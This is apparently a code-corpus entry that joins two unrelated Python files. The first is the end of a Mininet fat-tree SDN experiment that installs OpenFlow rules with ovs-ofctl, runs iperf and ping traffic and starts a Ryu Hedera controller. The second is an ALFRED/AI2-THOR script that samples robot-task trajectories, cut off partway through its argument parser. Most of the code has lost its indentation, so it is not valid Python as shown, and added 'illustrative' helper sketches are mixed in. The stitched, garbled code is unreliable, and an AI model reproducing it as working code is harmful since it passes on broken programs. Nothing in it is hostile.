nw_dst=10.%d.0.%d,actions=output:%d'" % (sw, num, i, topo.pod/2+i)
os.system(cmd)
# Upstream.
# Install group entries.
if topo.pod == 4:
cmd = "ovs-ofctl add-group %s -O OpenFlow13 \
'group_id=1,type=select,bucket=output:1,bucket=output:2'" % sw
elif topo.pod == 8:
cmd = "ovs-ofctl add-group %s -O OpenFlow13 \
'group_id=1,type=select,bucket=output:1,bucket=output:2,\
bucket=output:3,bucket=output:4'" % sw
else:
pass
os.system(cmd)
# Install flow entries.
Edge_List = [i for i in xrange(1, 1 + topo.pod ** 2 / 2)]
for i in Edge_List:
if i != num:
for j in xrange(1, topo.pod / 2 + 1):
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 'table=0,priority=10,ip,nw_proto=1,nw_src=10.%d.0.%d,actions=group:1'" % (
sw, num, j)
os.system(cmd)
for k in xrange(1, topo.pod / 2 + 1):
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,arp,\
nw_src=10.%d.0.%d,nw_dst=10.%d.0.%d,actions=group:1'" % (sw, num, j, i, k)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip,\
nw_src=10.%d.0.%d,nw_dst=10.%d.0.%d,actions=group:1'" % (sw, num, j, i, k)
os.system(cmd)
# Aggregate Switch
for sw in topo.AggSwitchList:
num = int(sw[-2:])
subnetList = create_subnetList(topo, num)
# Downstream.
k = 1
for i in subnetList:
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,arp, \
nw_dst=10.%d.0.0/16, actions=output:%d'" % (sw, i, topo.pod/2+k)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip, \
nw_dst=10.%d.0.0/16, actions=output:%d'" % (sw, i, topo.pod/2+k)
os.system(cmd)
k += 1
# Upstream.
if topo.pod == 4:
cmd = "ovs-ofctl add-group %s -O OpenFlow13 \
'group_id=1,type=select,bucket=output:1,bucket=output:2'" % sw
elif topo.pod == 8:
cmd = "ovs-ofctl add-group %s -O OpenFlow13 \
'group_id=1,type=select,bucket=output:1,bucket=output:2,\
bucket=output:3,bucket=output:4'" % sw
else:
pass
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,priority=10,arp,actions=group:1'" % sw
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,priority=10,ip,actions=group:1'" % sw
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,priority=10,ip,nw_proto=1 actions=group:1'" % sw
os.system(cmd)
# Core Switch
for sw in topo.CoreSwitchList:
j = 1
k = 1
for i in xrange(1, len(topo.EdgeSwitchList)+1):
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,arp, \
nw_dst=10.%d.0.0/16, actions=output:%d'" % (sw, i, j)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip, \
nw_dst=10.%d.0.0/16, actions=output:%d'" % (sw, i, j)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip,nw_proto=1,nw_dst=10.%d.0.0/16,actions=output:%d'" % (sw, i, j)
os.system(cmd)
k += 1
if k == topo.pod/2 + 1:
j += 1
k = 1
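# --- Illustrative debugging helper (a sketch, not part of the original script) ---
# install_proactive() shells out to ovs-ofctl to push its rules; while debugging it
# is handy to dump what actually landed on each switch. The helper below only reuses
# the standard "ovs-ofctl dump-flows" / "dump-groups" subcommands and the switch
# lists already kept on the topo object.
def dump_flow_tables(topo):
    """Print the installed flow and group tables of every switch (debug aid)."""
    for sw in topo.EdgeSwitchList + topo.AggSwitchList + topo.CoreSwitchList:
        os.system("ovs-ofctl dump-flows %s -O OpenFlow13" % sw)
        os.system("ovs-ofctl dump-groups %s -O OpenFlow13" % sw)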
def monitor_devs_ng(fname="./txrate.txt", interval_sec=0.1):
"""
    Use the bwm-ng tool to collect per-interface transmit-rate statistics.
    bwm-ng mode: rate (CSV output, bit units);
    sampling interval: interval_sec seconds (passed to bwm-ng as milliseconds).
"""
cmd = "sleep 1; bwm-ng -t %s -o csv -u bits -T rate -C ',' > %s" % (interval_sec * 1000, fname)
Popen(cmd, shell=True).wait()
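# --- Illustrative post-processing sketch (not part of the original script) ---
# monitor_devs_ng() leaves a comma-separated bwm-ng dump behind; a minimal parser
# could look like the sketch below. The assumed column layout (timestamp,
# interface, rate fields, ...) should be checked against the bwm-ng version in use.
def parse_bwmng_csv(fname="./txrate.txt", rate_column=2):
    """Return {interface: [rate samples]} read from a bwm-ng CSV dump (sketch)."""
    import csv
    rates = {}
    with open(fname) as f:
        for row in csv.reader(f):
            if len(row) <= rate_column:
                continue
            iface = row[1]
            try:
                rates.setdefault(iface, []).append(float(row[rate_column]))
            except ValueError:
                continue  # skip header or summary lines that are not numeric
    return rates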
def traffic_generation1(net,flows_peers,ping_peers):
"""
Generate traffics and test the performance of the network.
"""
# 1.Start iperf. (Elephant flows)
# Start the servers.
serversList = set([peer[1] for peer in flows_peers])
for server in serversList:
# filename = server[1:]
server = net.get(server)
# server.cmd("iperf -s > %s/%s &" % (args.output_dir, 'server'+filename+'.txt'))
server.cmd("iperf -s > /dev/null &") # Its statistics is useless, just throw away.
time.sleep(3)
# Start the clients.
for src, dest in flows_peers:
time.sleep(1)
server = net.get(dest)
client = net.get(src)
client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), 3000))
pingTest(net,ping_peers)
time.sleep(30)
monitor = Process(target=monitor_devs_ng, args=('%s/bwmng.txt' % args.output_dir, 1.0))
monitor.start()
# client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), 2500) ) # Its statistics is useless, just throw away. 1990 just means a great
# client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), random.randint(10,60)))
# time.sleep(1)
# monitor = Process(target = monitor_devs_ng, args = ('%s/bwmng.txt' % args.output_dir, 1.0))
# Wait for the traffic to become stable.
# 3. The experiment is going on.
time.sleep(args.duration + 5)
monitor.terminate()
def traffic_generation(net,flows_peers,monitor1,monitor):
"""
Generate traffics and test the performance of the network.
"""
# 1.Start iperf. (Elephant flows)
# Start the servers.
serversList = set([peer[1] for peer in flows_peers])
for server in serversList:
# filename = server[1:]
server = net.get(server)
# server.cmd("iperf -s > %s/%s &" % (args.output_dir, 'server'+filename+'.txt'))
server.cmd("iperf -s > /dev/null &") # Its statistics is useless, just throw away.
time.sleep(3)
# Start the clients.
monitor1.start()
for src, dest in flows_peers:
time.sleep(1)
server = net.get(dest)
client = net.get(src)
Thread(target=iperfC,args=(client,server.IP(),3000,)).start()
# client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), 2500) ) # Its statistics is useless, just throw away. 1990 just means a great
# client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), random.randint(10,60)))
time.sleep(60)
monitor.start()
# monitor = Process(target = monitor_devs_ng, args = ('%s/bwmng.txt' % args.output_dir, 1.0))
# Wait for the traffic to become stable.
# 3. The experiment is going on.
time.sleep(args.duration + 5)
monitor.terminate()
monitor1.terminate()
def iperfC(client,ip,time):
client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (ip, time))
def iperfTest(net, topo):
"""
Start iperf test.
"""
h001, h015, h016 = net.get(
topo.HostList[0], topo.HostList[14], topo.HostList[15])
# iperf Server
h001.popen('iperf -s -u -i 1 > iperf_server_differentPod_result', shell=True)
# iperf Server
h015.popen('iperf -s -u -i 1 > iperf_server_samePod_result', shell=True)
# iperf Client
h016.cmdPrint('iperf -c ' + h001.IP() + ' -u -t 10 -i 1 -b 10m')
h016.cmdPrint('iperf -c ' + h015.IP() + ' -u -t 10 -i 1 -b 10m')
def pingTest(net,flows_peers):
"""
Start ping test.
"""
count = 0
for src, dst in flows_peers:
count += 1
server = net.get(dst)
client = net.get(src)
# client.cmd('ping %s -c %d > %s/pingTest/ping_%s_%s_%d &' % (server.IP(), 60, args.output_dir, src, dst, count))
        client.cmd('ping -c %d -i 0.1 -n -q %s >> %s/%s &' % (args.duration, server.IP(), args.output_dir, 'successive_packets.txt'))
time.sleep(random.random())
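# --- Illustrative post-processing sketch (not part of the original script) ---
# pingTest() appends "ping -q" summaries to successive_packets.txt; the sketch
# below pulls the loss figures back out. The regular expression assumes the usual
# iputils summary line ("N packets transmitted, M received, X% packet loss, ...").
def parse_ping_loss(fname):
    """Return the packet-loss percentages found in a ping log file (sketch)."""
    import re
    pattern = re.compile(r'(\d+(?:\.\d+)?)% packet loss')
    with open(fname) as f:
        return [float(m.group(1)) for m in pattern.finditer(f.read())]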
def createTopo(pod, density, ip="192.168.16.137", port=6653, bw_c2a=100, bw_a2e=100, bw_e2h=100):
"""
Create network topology and run the Mininet.
"""
iperfPath = '/home/lee/ryu2/ryu/app/experiments/iperf_peers.txt'
pingPath = '/home/lee/ryu2/ryu/app/experiments/ping_test.txt'
# lossPath = '/home/lee/ryu2/ryu/app/experiments/link_loss.txt'
iperf_peers = readIpeers(iperfPath)
ping_peers = readIpeers(pingPath)
# loss = readIpeers(lossPath)
time.sleep(2)
topo = Fattree(pod, density)
topo.createNodes()
topo.createLinks(bw_c2a=bw_c2a, bw_a2e=bw_a2e, bw_e2h=bw_e2h)
# Start Mininet.
CONTROLLER_IP = ip
CONTROLLER_PORT = port
net = Mininet(topo=topo, link=TCLink, controller=None, autoSetMacs=True)
net.addController(
'controller', controller=RemoteController,
ip=CONTROLLER_IP, port=CONTROLLER_PORT)
net.start()
# Set OVS's protocol as OF13.
topo.set_ovs_protocol_13()
# Set hosts IP addresses.
set_host_ip(net, topo)
# Install proactive flow entries
install_proactive(net, topo)
# dumpNodeConnections(net.hosts)
# pingTest(net)
# iperfTest(net, topo)
k_paths = args.k ** 2 / 4
fanout = args.k
Controller_Ryu = Popen(
"ryu-manager --observe-links ./Hedera/Hedera.py --k_paths=%d --weight=bw --fanout=%d" % (k_paths, fanout),
shell=True, preexec_fn=os.setsid)
# Wait until the controller has discovered network topology.
time.sleep(60)
# monitor1 = Process(target=pingTest, args=(net, ping_peers))
# monitor = Process(target=monitor_devs_ng, args=('%s/bwmng.txt' % args.output_dir, 1.0))
# 3. Generate traffics and test the performance of the network.
# traffic_generation(net,iperf_peers,monitor1,monitor)
traffic_generation1(net, iperf_peers, ping_peers)
os.system('killall ping')
os.system('killall iperf')
# Stop the controller
# CLI(net)
os.killpg(Controller_Ryu.pid, signal.SIGKILL)
net.stop()
if __name__ == '__main__':
setLogLevel('info')
    if os.getuid() != 0:
        logging.warning("You are NOT root")
    else:
        createTopo(4, 2)
# createTopo(8, 4)
|
sample_augmentation_trajectories.py
|
'''Sample partial/full trajectories starting from a list of previously failed tasks.'''
import os
import sys
sys.path.append(os.path.join(os.environ['ALFRED_ROOT']))
sys.path.append(os.path.join(os.environ['ALFRED_ROOT'], 'gen'))
import time
import multiprocessing as mp
import subprocess
import json
import random
import shutil
import argparse
import numpy as np
import progressbar
import pandas as pd
from collections import OrderedDict
from datetime import datetime
import constants
from constants_scene_nums import VALID_UNSEEN_SCENES, TEST_SEEN_SCENES, TEST_UNSEEN_SCENES
from env.thor_env import ThorEnv
from agents.deterministic_planner_agent import DeterministicPlannerAgent
from game_states.task_game_state_full_knowledge import TaskGameStateFullKnowledge
from utils.video_util import VideoSaver
# params
RAW_IMAGES_FOLDER = 'raw_images/'
DATA_JSON_FILENAME = 'traj_data.json'
# video saver
video_saver = VideoSaver()
# structures to help with constraint enforcement.
goal_to_required_variables = {"pick_and_place_simple": {"pickup", "receptacle", "scene"},
"pick_two_obj_and_place": {"pickup", "receptacle", "scene"},
"look_at_obj_in_light": {"pickup", "receptacle", "scene"},
"pick_clean_then_place_in_recep": {"pickup", "receptacle", "scene"},
"pick_heat_then_place_in_recep": {"pickup", "receptacle", "scene"},
"pick_cool_then_place_in_recep": {"pickup", "receptacle", "scene"},
"pick_and_place_with_movable_recep": {"pickup", "movable", "receptacle", "scene"}}
goal_to_pickup_type = {'pick_heat_then_place_in_recep': 'Heatable',
'pick_cool_then_place_in_recep': 'Coolable',
'pick_clean_then_place_in_recep': 'Cleanable'}
goal_to_receptacle_type = {'look_at_obj_in_light': "Toggleable"}
goal_to_invalid_receptacle = {'pick_heat_then_place_in_recep': {'Microwave'},
'pick_cool_then_place_in_recep': {'Fridge'},
'pick_clean_then_place_in_recep': {'SinkBasin'},
'pick_two_obj_and_place': {'CoffeeMachine', 'ToiletPaperHanger', 'HandTowelHolder'}}
scene_id_to_objs = {}
obj_to_scene_ids = {}
scenes_for_goal = {g: [] for g in constants.GOALS}
scene_to_type = {}
def save_video():
images_path = constants.save_path + '*.png'
video_path = os.path.join(constants.save_path.replace(RAW_IMAGES_FOLDER, ''), 'video.mp4')
video_saver.save(images_path, video_path)
def setup_data_dict():
constants.data_dict = OrderedDict()
constants.data_dict['task_id'] = ""
constants.data_dict['task_type'] = ""
constants.data_dict['scene'] = {'floor_plan': "", 'random_seed': -1, 'scene_num': -1, 'init_action': [],
'object_poses': [], 'dirty_and_empty': None, 'object_toggles': []}
constants.data_dict['plan'] = {'high_pddl': [], 'low_actions': []}
constants.data_dict['images'] = []
constants.data_dict['template'] = {'task_desc': "", 'high_descs': []}
constants.data_dict['pddl_params'] = {'object_target': -1, 'object_sliced': -1,
'parent_target': -1, 'toggle_target': -1,
'mrecep_target': -1}
constants.data_dict['dataset_params'] = {'video_frame_rate': -1}
constants.data_dict['pddl_state'] = []
def dump_data_dict():
data_save_path = constants.save_path.replace(RAW_IMAGES_FOLDER, '')
with open(os.path.join(data_save_path, DATA_JSON_FILENAME), 'w') as fp:
json.dump(constants.data_dict, fp, sort_keys=True, indent=4)
def delete_save(in_parallel):
'''
    Delete all collected images in the save directory. Used in debug runs.
    in_parallel: boolean. If using multiple processes and another process is attempting this task,
    don't delete.
'''
save_folder = constants.save_path.replace(RAW_IMAGES_FOLDER, '')
if os.path.exists(save_folder):
try:
shutil.rmtree(save_folder)
except OSError as e:
if in_parallel: # another process succeeded at this task while this one failed.
return False
else:
                raise e  # if we're not running in parallel, this is an actual error.
return True
def make_task_name(task_tuple):
gtype, pickup_obj, movable_obj, receptacle_obj, scene_num = task_tuple
# e.g. 'pick_two_obj_and_place-Watch-None-Dresser-301'
return '%s-%s-%s-%s-%s' % (gtype, pickup_obj, movable_obj, receptacle_obj, scene_num)
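# --- Illustrative helper (a sketch, not part of the original repository) ---
# make_task_name() joins the five task fields with '-', and main() below recovers
# them with a plain str.split('-'). An explicit inverse keeps that convention in
# one place; the scene number is left as a string, which matches how main() uses it.
def parse_task_name(task_name):
    '''Inverse of make_task_name: 'gtype-pickup-movable-receptacle-scene' -> 5-tuple.'''
    gtype, pickup_obj, movable_obj, receptacle_obj, scene_num = task_name.split('-')
    return gtype, pickup_obj, movable_obj, receptacle_obj, scene_num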
def create_dirs(task_name, seed, obj_repeat):
'''
create dir like
<args.save_path>/pick_two_obj_and_place-Watch-None-Dresser-301/trial_T20200609_122157_214995
'''
task_id = 'trial_T' + datetime.now().strftime("%Y%m%d_%H%M%S_%f")
task_name_task_id = f'{task_name}/{task_id}/'
constants.save_path = os.path.join(constants.DATA_SAVE_PATH, task_name_task_id, RAW_IMAGES_FOLDER)
if not os.path.exists(constants.save_path):
os.makedirs(constants.save_path)
print("Saving images to: " + constants.save_path)
return task_id
def save_bookkeeping_and_splits(task_name, save_path, splits_dir, traj_dirs, errors, process_i=None):
'''
save successful and failed path strings to file.
save error type and counts to file.
'''
thread_suffix = f'_{process_i}' if process_i is not None else ''
# flatten to a list of success paths
success_traj_dirs = []
    # make raw split file for next step in pipeline -- object state collection
split_entries = []
for seed_key in traj_dirs['successes']:
success_traj_dirs.append(traj_dirs['successes'][seed_key])
split_entries.append({'task':'/'.join(traj_dirs['successes'][seed_key].split('/')[-3:-1])})
os.makedirs(os.path.join(save_path, 'pipeline_logs'), exist_ok=True)
# save flat list of successful paths
path_successes = os.path.join(
save_path, 'pipeline_logs', f'{task_name}_success_dirs_T{constants.TIME_NOW}{thread_suffix}.json'
)
with open(path_successes, 'w') as f:
json.dump(success_traj_dirs, f)
# save dictionary with both success and fails, along with their seeds.
path_samp_res = os.path.join(
save_path, 'pipeline_logs', f'{task_name}_sampled_traj_dirs_T{constants.TIME_NOW}{thread_suffix}.json'
)
with open(path_samp_res, 'w') as f:
json.dump(traj_dirs, f)
# save dictionary with errors and their counts
if process_i is not None:
path_errors = os.path.join(
save_path, 'pipeline_logs', f'{task_name}_errors_T{constants.TIME_NOW}{thread_suffix}.json'
)
with open(path_errors, 'w') as f:
json.dump(errors, f)
else:
path_errors = os.path.join(save_path, 'pipeline_logs', f'errors_T{constants.TIME_NOW}.json')
with open(path_errors, 'w') as f:
json.dump({task_name: errors}, f)
# save to raw split file
split_path = os.path.join(splits_dir, f'demo_T{constants.TIME_NOW}{thread_suffix}_raw.json')
with open(split_path, 'w') as f:
json.dump({'augmentation':split_entries}, f)
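# For reference, the raw split file written above has the shape
#   {"augmentation": [{"task": "<task_name>/<trial_id>"}, ...]}
# where "<task_name>/<trial_id>" is taken from the last two path components of each
# successful trajectory directory, e.g.
# "pick_two_obj_and_place-Watch-None-Dresser-301/trial_T20200609_122157_214995".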
def merge_process_results(args):
'''merge results from multiple threads, they may or may not be working on the same task tuples'''
# Merge splits
merge_split = {'augmentation':[]}
output_split_path = os.path.join(args.splits_dir, f'demo_T{constants.TIME_NOW}_raw.json')
for process_i in range(args.num_processes):
thread_split_path = output_split_path.replace('_raw', f'_{process_i}_raw')
with open(thread_split_path, 'r') as f:
merge_split['augmentation'] += json.load(f)['augmentation']
os.remove(thread_split_path)
with open(output_split_path, 'w') as f:
json.dump(merge_split, f)
print('\nSaved output split for full success, complete (NOT partial) tasks to :', output_split_path)
# Merge error counts
# identify all the task names
task_names = []
for root, dirs, files in os.walk(constants.DATA_SAVE_PATH):
for d in dirs:
if d.count('-') == 4:
task_names.append(d)
task_names = set(task_names)
print('Task names from threads:', task_names)
merge_errors = {}
output_errors_path = os.path.join(constants.DATA_SAVE_PATH, 'pipeline_logs', f'errors_T{constants.TIME_NOW}.json')
for task_name in task_names:
merge_errors[task_name] = {}
for process_i in range(args.num_processes):
            thread_errors_path = os.path.join(
                constants.DATA_SAVE_PATH, 'pipeline_logs',
                f'{task_name}_errors_T{constants.TIME_NOW}_{process_i}.json'
            )
if os.path.exists(thread_errors_path):
with open(thread_errors_path, 'r') as f:
thread_errors = json.load(f)
print(f'thread {process_i}:')
for k in thread_errors.keys():
print(f'{k} \t\t\t\t{thread_errors[k]}')
if k not in merge_errors[task_name].keys():
merge_errors[task_name][k] = 0
merge_errors[task_name][k] += thread_errors[k]
with open(output_errors_path, 'w') as f:
json.dump(merge_errors, f)
print('Saved error logs to :', output_errors_path)
def count_successes_from_disk(task_tuple):
task_name = make_task_name(task_tuple)
print(task_name)
success_count = 0
# top constants.DATA_SAVE_PATH
for root, dirs, files in os.walk(constants.DATA_SAVE_PATH):
for d in dirs:
if d.count('-') == 4 and d == task_name:
for _root, _dirs, _files in os.walk(os.path.join(constants.DATA_SAVE_PATH, d)):
for _d in _dirs:
for __root, __dirs, __files in os.walk(os.path.join(constants.DATA_SAVE_PATH, d, _d)):
if 'video.mp4' in __files:
success_count += 1
break
return success_count
def sample_task_trajs(
args, task_tuple, agent, env, obj_to_scene_ids,
scene_id_to_objs, pickup_candidates, add_requirements={}):
'''
    Sample a trajectory according to the task tuple and save it to disk.
    task_tuple: tuple( str(goal_type), str(pickup object type),
        str(movable receptacle object type), str(receptacle object type), int(scene number) ).
    Example: ('pick_two_obj_and_place', 'Watch', 'None', 'Dresser', 205)
    add_requirements: optional dict. Example: {'obj_repeat': 3, 'seeds': [42]}
'''
print("Force Unsave Success Data: %s" % str(args.force_unsave_successes))
# scene_num is an integer
gtype, pickup_obj, movable_obj, receptacle_obj, scene_num = task_tuple
print(f'Task: {task_tuple}')
# success and failure book-keeping
# k=error type, v=int count
errors = {}
# k=seed, v=traj dir path
sampled_traj_dirs = {'successes':{}, 'fails':{}}
# try multiple times
target_remaining = args.repeats_per_cond - count_successes_from_disk(task_tuple)
tries_remaining = args.trials_before_fail
num_place_fails = 0
# set random seeds -- determines room object locations and agent start pos
if 'seeds' in add_requirements.keys():
        # all trials will generate the same results!
seeds = add_requirements['seeds']
else:
seeds = [random.randint(0, 2 ** 32) for _ in range(args.trials_before_fail)]
print('SEED = ', seeds)
# optionally specify how 'crowded' the room is with non-task objects
if 'obj_repeat' in add_requirements.keys():
obj_repeat = add_requirements['obj_repeat']
else:
obj_repeat = None
while tries_remaining > 0 :
constants.pddl_goal_type = gtype
print("PDDLGoalType: " + constants.pddl_goal_type)
# determines room agent start pos
seed = seeds.pop()
# e.g. 'pick_two_obj_and_place-Watch-None-Dresser-205'
task_name = make_task_name(task_tuple)
# create task directory to store plan, trajectory json and raw images
# task_id e.g. trial_T20200609_122157_214995
task_id = create_dirs(task_name, seed, obj_repeat)
task_root = constants.save_path.replace('raw_images/', '')
# setup data dictionary for traj.json output
setup_data_dict()
constants.data_dict['task_id'] = task_id
constants.data_dict['task_type'] = constants.pddl_goal_type
constants.data_dict['dataset_params']['video_frame_rate'] = constants.VIDEO_FRAME_RATE
try:
# spawn pickup object instances
# 'repeat', number of instance to spawn for pickup object type
# 'sparse', how much space to free up around receptacle object instance
constraint_objs = {'repeat': [(constants.OBJ_PARENTS[pickup_obj],
np.random.randint(2 if gtype == "pick_two_obj_and_place" else 1,
constants.PICKUP_REPEAT_MAX + 1))],
'sparse': [(receptacle_obj.replace('Basin', ''),
num_place_fails * constants.RECEPTACLE_SPARSE_POINTS)]}
# if task requires, spawn movable receptacle instances
# 'repeat', number of instance to spawn for movable receptacle type,
if movable_obj != "None":
constraint_objs['repeat'].append((movable_obj,
np.random.randint(1, constants.PICKUP_REPEAT_MAX + 1)))
# spawn some more random objects in the scene
# allow only object types listed in scene asset
for obj_type in scene_id_to_objs[str(scene_num)]:
# allow only object types not same as task objects
if (obj_type in pickup_candidates and
obj_type != constants.OBJ_PARENTS[pickup_obj] and obj_type != movable_obj):
if obj_repeat is None:
constraint_objs['repeat'].append(
(obj_type,np.random.randint(1, constants.MAX_NUM_OF_OBJ_INSTANCES + 1)))
else:
constraint_objs['repeat'].append(
(obj_type, obj_repeat))
# make sure there's enough space in microwave, sink, fridge etc if task needs it
if gtype in goal_to_invalid_receptacle:
constraint_objs['empty'] = [
(r.replace('Basin', ''), num_place_fails * constants.RECEPTACLE_EMPTY_POINTS)
for r in goal_to_invalid_receptacle[gtype]
]
# turn off the lights if task needs it
constraint_objs['seton'] = []
if gtype == 'look_at_obj_in_light':
constraint_objs['seton'].append((receptacle_obj, False))
# alert user that scene is now sparser if last try failed
if num_place_fails > 0:
print("Failed %d placements in the past; increased free point constraints: " % num_place_fails
+ str(constraint_objs))
# thor env spawn up the scene according to constraint objs
scene_info = {'scene_num': int(scene_num), 'random_seed': seed}
info = agent.reset(scene=scene_info, objs=constraint_objs)
# initialize problem definition for pddl planner
task_objs = {'pickup': pickup_obj}
if movable_obj != "None":
task_objs['mrecep'] = movable_obj
if gtype == "look_at_obj_in_light":
task_objs['toggle'] = receptacle_obj
else:
task_objs['receptacle'] = receptacle_obj
# specific object instances (with ID) are chosen for pickup and receptacle targets
agent.setup_problem({'info': info}, scene=scene_info, objs=task_objs)
# start recording metadata for positions of objects
object_poses = [{'objectName': obj['name'].split('(Clone)')[0],
'position': obj['position'],
'rotation': obj['rotation']}
for obj in env.last_event.metadata['objects'] if obj['pickupable']]
dirty_and_empty = gtype == 'pick_clean_then_place_in_recep'
object_toggles = [{'objectType': o, 'isOn': v}
for o, v in constraint_objs['seton']]
constants.data_dict['scene']['object_poses'] = object_poses
constants.data_dict['scene']['dirty_and_empty'] = dirty_and_empty
constants.data_dict['scene']['object_toggles'] = object_toggles
            # reinitialize and restore the scene from the recorded object poses, so that a THOR
            # update or a different random seed cannot change the scene layout used here.
print("Performing reset via thor_env API")
env.reset(int(scene_num))
print("Performing restore via thor_env API")
env.restore_scene(object_poses, object_toggles, dirty_and_empty)
# send agent into the scene at an initial pos
event = env.step(dict(constants.data_dict['scene']['init_action']))
# compute the plan and execute it
terminal = False
while not terminal and agent.current_frame_count <= constants.MAX_EPISODE_LENGTH:
# 1. agent get plan from solver -- ff_planner_handler.py get_plan_from_file()
# 2. agent step in thor env -- plan_agent.py self.controller_agent.step()
action_dict = agent.get_action(None)
agent.step(action_dict)
reward, terminal = agent.get_reward()
# dump constants.data_dict to file
dump_data_dict()
# save images in images_path to video_path
save_video()
# book keeping
sampled_traj_dirs['successes'][seed] = task_root
except Exception as e:
# report error in stdout
import traceback
traceback.print_exc()
sampled_traj_dirs['fails'][seed] = task_root
dump_data_dict()
if str(e) == "API Action Failed: No valid positions to place object found":
num_place_fails += 1
estr = str(e)
if len(estr) > 120:
estr = estr[:120]
if estr not in errors:
errors[estr] = 0
errors[estr] += 1
print("%%%%%%%%%%")
es = sum([errors[er] for er in errors])
print("\terrors (%d):" % es)
for er, v in sorted(errors.items(), key=lambda kv: kv[1], reverse=True):
if v / es < 0.01: # stop showing below 1% of errors.
break
print("\t(%.2f) (%d)\t%s" % (v / es, v, er))
print("%%%%%%%%%%")
finally:
tries_remaining -= 1
target_remaining = args.repeats_per_cond - count_successes_from_disk(task_tuple)
# optionally delete directory for successful tasks.
if args.force_unsave_successes:
delete_save(args.in_parallel)
print("---------------End of Sampling----------------")
print((gtype, pickup_obj, movable_obj, receptacle_obj, str(scene_num)))
print(
'Finished a maximum of {} trials, with {} fails.'.format(
args.trials_before_fail, sum([errors[er] for er in errors])
)
)
# if this combination resulted in a certain number of failures with no successes, flag it as not possible.
if tries_remaining == 0 and target_remaining == args.repeats_per_cond:
        print('The specified tuple is too hard: no successful trajectories were sampled.')
return sampled_traj_dirs, errors
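# --- Illustrative direct call (a sketch, not part of the original pipeline) ---
# sample_task_trajs() is normally driven by main() below, but it can also be invoked
# directly once an env/agent pair exists. The add_requirements keys shown here
# ('seeds', 'obj_repeat') are the two the function actually checks; the seed and
# repeat values are made-up examples.
#
#   task_tuple = ('pick_two_obj_and_place', 'Watch', 'None', 'Dresser', 205)
#   traj_dirs, errors = sample_task_trajs(
#       args, task_tuple, agent, env, obj_to_scene_ids,
#       scene_id_to_objs, pickup_candidates,
#       add_requirements={'seeds': [42, 43, 44], 'obj_repeat': 3})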
def main(args, task_names_dict, process_i=0):
if args.seed is not None:
# keep agent start pos always the same
# keep the way object varies across trials predictable
np.random.seed(args.seed)
# ---------------------Setup Scene and Object Candidates------------------------
# objects-to-scene and scene-to-objects database
for scene_type, ids in constants.SCENE_TYPE.items():
for id in ids:
obj_json_file = os.path.join('layouts', 'FloorPlan%d-objects.json' % id)
with open(obj_json_file, 'r') as of:
scene_objs = json.load(of)
id_str = str(id)
scene_id_to_objs[id_str] = scene_objs
for obj in scene_objs:
if obj not in obj_to_scene_ids:
obj_to_scene_ids[obj] = set()
obj_to_scene_ids[obj].add(id_str)
# scene-goal database
for g in constants.GOALS:
for st in constants.GOALS_VALID[g]:
scenes_for_goal[g].extend([str(s) for s in constants.SCENE_TYPE[st]])
scenes_for_goal[g] = set(scenes_for_goal[g])
# scene-type database
for st in constants.SCENE_TYPE:
for s in constants.SCENE_TYPE[st]:
scene_to_type[str(s)] = st
# Union objects that can be placed.
pickup_candidates = list(
set().union(*[constants.VAL_RECEPTACLE_OBJECTS[obj] for obj in constants.VAL_RECEPTACLE_OBJECTS])
)
pickup_candidates = [p for p in pickup_candidates if constants.OBJ_PARENTS[p] in obj_to_scene_ids]
# objects that can be used as receptacle
receptacle_candidates = [obj for obj in constants.VAL_RECEPTACLE_OBJECTS
if obj not in constants.MOVABLE_RECEPTACLES and obj in obj_to_scene_ids] + \
[obj for obj in constants.VAL_ACTION_OBJECTS["Toggleable"]
if obj in obj_to_scene_ids]
# toaster isn't interesting in terms of producing linguistic diversity
receptacle_candidates.remove('Toaster')
receptacle_candidates.sort()
# ---------------------Setup Env and Agent--------------------------------------
# create env and agent
env = ThorEnv()
game_state = TaskGameStateFullKnowledge(env)
agent = DeterministicPlannerAgent(thread_id=0, game_state=game_state)
# ---------------------Sample the tasks one by one------------------------------
dont_sample_scenes = VALID_UNSEEN_SCENES | TEST_SEEN_SCENES | TEST_UNSEEN_SCENES
for curr_task_name in progressbar.progressbar(task_names_dict[process_i]):
# construct task tuple
task_tuple = curr_task_name.split('-')
# filter out unseen and test environments
if task_tuple[-1] in dont_sample_scenes:
continue
# call sample_task_trajs
sampled_traj_dirs, errors = sample_task_trajs(
args, task_tuple, agent, env, obj_to_scene_ids, scene_id_to_objs, pickup_candidates, {})
# save the directory paths for success and failed trajectories,
# and error counts to disk
save_bookkeeping_and_splits(
curr_task_name, constants.DATA_SAVE_PATH, args.splits_dir,
sampled_traj_dirs, errors, process_i)
def parallel_main(args):
procs = [
mp.Process(target=main, args=(args, task_names_dict, process_i)) for process_i in range(args.num_processes)
]
try:
for proc in procs:
proc.start()
time.sleep(0.1)
finally:
for proc in procs:
proc.join()
subprocess.call(["pkill", "-f", 'thor'])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# save settings
parser.add_argument(
'--force_unsave_successes', action='store_true',
help="don't save any data for successful traj (for debugging purposes)"
)
parser.add_argument(
'--data_root', type=str, help="top data directory \
